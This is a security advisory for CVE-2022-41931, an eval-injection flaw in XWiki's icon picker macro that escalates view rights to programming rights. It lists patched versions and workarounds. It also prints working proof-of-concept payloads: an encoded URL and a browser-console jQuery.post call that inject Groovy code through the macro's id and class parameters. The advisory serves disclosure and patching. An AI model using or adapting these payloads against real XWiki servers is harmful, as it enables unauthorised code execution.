Headline
CVE-2022-41931: Privilege escalation (PR) from view rights through the icon picker macro
xwiki-platform-icon-ui is vulnerable to Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’). Any user with view rights on commonly accessible documents including the icon picker macro can execute arbitrary Groovy, Python or Velocity code in XWiki due to improper neutralization of the macro parameters of the icon picker macro. The problem has been patched in XWiki 13.10.7, 14.5 and 14.4.2. Workarounds: The patch can be manually applied by editing IconThemesCode.IconPickerMacro in the object editor. The whole document can also be replaced by the current version by importing the document from the XAR archive of a fixed version as the only changes to the document have been security fixes and small formatting changes.
Steps to reproduce
Go to the URL
<server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7BiconPicker%20id%3D%22’%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerId%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%20class%3D%22’%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerClass%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%2F%7D%7D
where <server> is your XWiki installation URL.
Expected result
Nothing is visible as everything is hidden in a <script>-tag.
Actual result
HellofromIconPickerId’).xwikiIconPicker(options); $(‘.’</script>{{/html}}HellofromIconPickerClass’).xwikiIconPicker(options); }); </script> {{/html}}
This demonstrates a privilege escalation from view rights on the icon picker macro, CKEditor and the Main page to programming rights through the “id” and “class”-parameters.
As the code that prints the parameter has been unchanged since the introduction as part of XWIKI-11388 this is exploitable since XWiki 6.4-milestone-2.
Reproduction steps on XWiki 6.4-milestone-2:
Run
jQuery.post('http://localhost:8080/xwiki/bin/view/Main/?xpage=wysiwyginput’, {source: '{{iconPicker id="\\\’</script>{{/html}}{{cache}}{{groovy}}println(/HellofromIconPickerId/){{/groovy}}{{/cache}}" class="\\\’</script>{{/html}}{{cache}}{{groovy}}println(/HellofromIconPickerClass/){{/groovy}}{{/cache}}"/}}’, token: document.documentElement.dataset.xwikiFormToken}, console.log)
in the console of the browser’s developer tools (replace localhost:8080 by the server’s URL).
Check for the output
$(‘#\’</script><p>HellofromIconPickerId</p>’).xwikiIconPicker(options);<br/>$(‘.\’</script>{{/html}}<p>HellofromIconPickerClass</p>’).xwikiIconPicker(options);<br/>});<br/></script><br/>{{/html}}</p>
Related news
### Impact Any user with view rights on commonly accessible documents including the icon picker macro can execute arbitrary Groovy, Python or Velocity code in XWiki due to improper neutralization of the macro parameters of the icon picker macro. The URL `<server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7BiconPicker%20id%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerId%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%20class%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerClass%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%2F%7D%7D` demonstrates the issue (replace `<server>` by the URL to your XWiki installation). If the output `HellofromIconPickerId` or `HellofromIconPickerClass` is visible, the XWiki installation is vulnerable (normally, all output should be conta...